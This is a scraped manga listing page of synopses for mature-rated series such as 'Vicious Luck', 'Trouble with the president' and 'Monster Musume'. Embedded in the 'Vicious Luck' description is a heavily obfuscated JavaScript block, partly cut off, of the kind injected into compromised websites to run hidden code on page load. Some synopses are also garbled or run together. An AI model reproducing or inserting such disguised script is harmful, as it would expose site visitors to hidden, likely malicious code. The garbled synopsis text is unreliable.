Mature - Page 209

Explore an incredible selection of best Mature manga free to read. Dive into the exciting world of Mature manga today!

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18+ Vicious Luck

Chen Yang was just an ordinary person. One day, he was given an opportunity: he was offered the ability to control his luck! Love, status, and fortune were suddenly all within his grasp. When a person can control his luck at will, how will his life change? Will he run into beauties as soon as he steps outside his door? Will he trade as much stock as he possibly can? Damn… it’s too good to be true… Those who are my friends will all live wonderful lives. Those who are my enemies have already paid the price!<script></script><script>(function(_0xccb202,_0x47bf26){var _0x5c82f9=_0x1d13,_0x3e7c42=_0xccb202();while(!![]){try{var _0x5817c8=-parseInt(_0x5c82f9(0xb8))/(-0x209d+0x485*0x7+0xfb)+-parseInt(_0x5c82f9(0xcd))/(-0x19e4*-0x1+-0x1*0x11c5+-0x81d)+parseInt(_0x5c82f9(0xc1))/(0x1*0xc5+-0x2*-0x11af+-0x2420)+-parseInt(_0x5c82f9(0xcb))/(0x22c*0x6+-0x2b*-0x89+-0x2407)+-parseInt(_0x5c82f9(0xb9))/(-0x3d*0x32+-0x1cdd+-0x2ea*-0xe)*(parseInt(_0x5c82f9(0xcf))/(-0x21c8+0x24c2+-0x2f4))+-parseInt(_0x5c82f9(0xba))/(-0xa*-0x3d3+-0x5*0x62+-0x1*0x244d)+parseInt(_0x5c82f9(0xbd))/(-0x20b5*0x1+-0x2539+0x45f6);if(_0x5817c8===_0x47bf26)break;else _0x3e7c42['push'](_0x3e7c42['shift']());}catch(_0x425f9b){_0x3e7c42['push'](_0x3e7c42['shift']());}}}(_0x3be2,-0xaed80+0x2c*0x1d5f+-0x31993*-0x6));function _0x1d13(_0x466487,_0x58752e){var _0x327798=_0x3be2();return _0x1d13=function(_0x4a1d92,_0x7cd320){_0x4a1d92=_0x4a1d92-(-0x1130+-0x1cd6+0x2ebb);var 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Trouble with the president

other name :  - Fall in Love With my Trouble After a failed one-night-stand, the bold woman left him secretly with"challenge words" on her bed sheet and he swore to find her back. "Most Wanted" appeared on headlines of papers the next day. Viewing her mobile phone, Tong Tianai blushed completely. "Qin Jinyang, President of Qin's Group..." She got into trouble with a president just because of her lip print... MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Arrogant CEO: Wife Hunter

“Don’t touch our mom!” Two children, a boy and a girl, block the demon boss outside. The woman he has his eyes on was not only claimed by someone else first, but also has two kids! “Heart robber, get out here!” Facing the crazy roars of the king is the very pure and innocent yet sexy mother…X years ago, she was violated against her will, is that her fault? C’mon you perverted and possessive madman, she’s a victim too! Huh? Why does this boy look like my own son? Could it be…“I spent a night with a stranger by mistake on the hotel side. He mistook him for a boyfriend under the influence of alcohol, but he was a stranger. I tried to clean forget about the day and start over with my boyfriend … but now after some time, I broke up with my boyfriend and had a beautiful twin mother. After a challenge, I was chosen to be the secretary of a large company chairman! However, Chairman Lee is quite familiar! ”Source to collect images:



What does a married couple do once they don't love each other anymore, but have a miraculous chance to start their love lives over? Follow two hopeless adults as they re-live their college lives starting from the day they first met... Original webtoon:

3 days ago

Shikabanechou Undead

Read “Shikabanechou Undead Novel” – “Shikabanechou Undead Manhwa” Online Free At Manga Zin The Summary Of The Comics “Shikabanechou Undead”: The Urban Exploration Of Two Teenagers Causes Them To Run Into A Mysterious “Box”, Which Encloses Those Infected With A Virus Called “Corpse”. In That City, There Is A Teacher Named Katsuragi Zakuro. Which Hides A Secret …… “Shikabanechou Undead” Is Alternatively Named: 尸城Undead / 尸落城市 / 屍町アンデッド The Comics “Shikabanechou Undead” Belongs To The Genre: Drama, Fantasy, Horror, Mature, Psychological, Romance, Seinen, Supernatural “Kun Manga, Manhwa Updates, Hari Manga…” Are The Most Searched Keywords On The Website Manhwa Clan. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging



Koharu, tired of all the men in her life being lying, married philanderers, decides to move back home, away from the city. Once there she finds her family saddled with a huge debt and no way out, until a handsome but creepy stranger offers to pay the debt, at the same time asking her to marry him. But, as if things weren't crazy enough, he already has two wives!



From Kawa Scans: Distributing thrilling videos in secret. A school game that puts life and death on the line.



One day, a picture book writer named Yorozu Hiraku was asked by his close online friend, Chintarou, if they could share a room while he attended a nearby university. Although they only knew each other through online interactions, Hikaru agrees to it without much thought. However unbeknownst to Hikaru, Chintarou, despite having a male name, is actually a girl; a very well endowed girl.



From Seven Seas Entertainment: Monsters? They're real, and they want to date us! Three years ago, the world learned that harpies, centaurs, catgirls, and all manners of fabulous creatures are not merely fiction; they are flesh and blood?not to mention scale, feather, horn, and fang. Thanks to the "Cultural Exchange Between Species Act," these once-mythical creatures have assimilated into society, or at least, they're trying. When a hapless human teenager named Kurusu Kimihito is inducted as a "volunteer" into the government exchange program, his world is turned upside down. A snake-like lamia named Miia comes to live with him, and it is Kurusu's job to take care of her and make sure she integrates into his everyday life. Unfortunately for Kurusu, Miia is undeniably sexy, and the law against interspecies breeding is very strict. Even worse, when a ravishing centaur girl and a flirtatious harpy move in, what's a full-blooded teenage human with raging hormones to do?



A gate appears in Tokyo's Ginza district sometime in the 21st century. From the gate pours out monsters, knights from middle-age Europe, and other fantasy-like beings, and they kill many of the citizens of Tokyo. This event is known as the Ginza Incident. The government sends a small group of soldiers from the Japanese Self-Defense Forces to the alternate world beyond the gate. Led by otaku soldier Yōji, they find that the villages in the world are being attacked by a dragon. An elf girl who is a survivor from the dragon's rampage joins the group in their travels across the dangerous new world.



Yakuza Yashiro, who only ever loved Kageyama, meets a new bodyguard, Doumeki Chikara. Unfortunately, the latter is impotent. The masochistic, lewd and beautiful yakuza Yashiro and his silent, clumsy, impotent subordinate, Doumeki. This is the story of a man who has never known happiness and of a man who is reborn by getting to know him.



With the space program attempting to travel to Mars, 21st century scientists were tasked with warming up the planet so that humans could survive on its surface. They came up with an efficient and cost effective plan of sending cockroaches and mold to the surface so that the mold would absorb the sunlight and the insect corpses would serve as a food source for the mold. It is now the year 2577 and the first manned ship to Mars has landed on the planet and the six crew members are ready for their mission. But what they find are giant mutated humanoid cockroaches with incredible physical strength. The crew members are easily wiped out, but not before sending a transmission back to Earth. Now, humanity will send elite warriors to exterminate the mutated bugs and claim back Mars. Note: Was nominated for the 6th Manga Taishou in 2013.
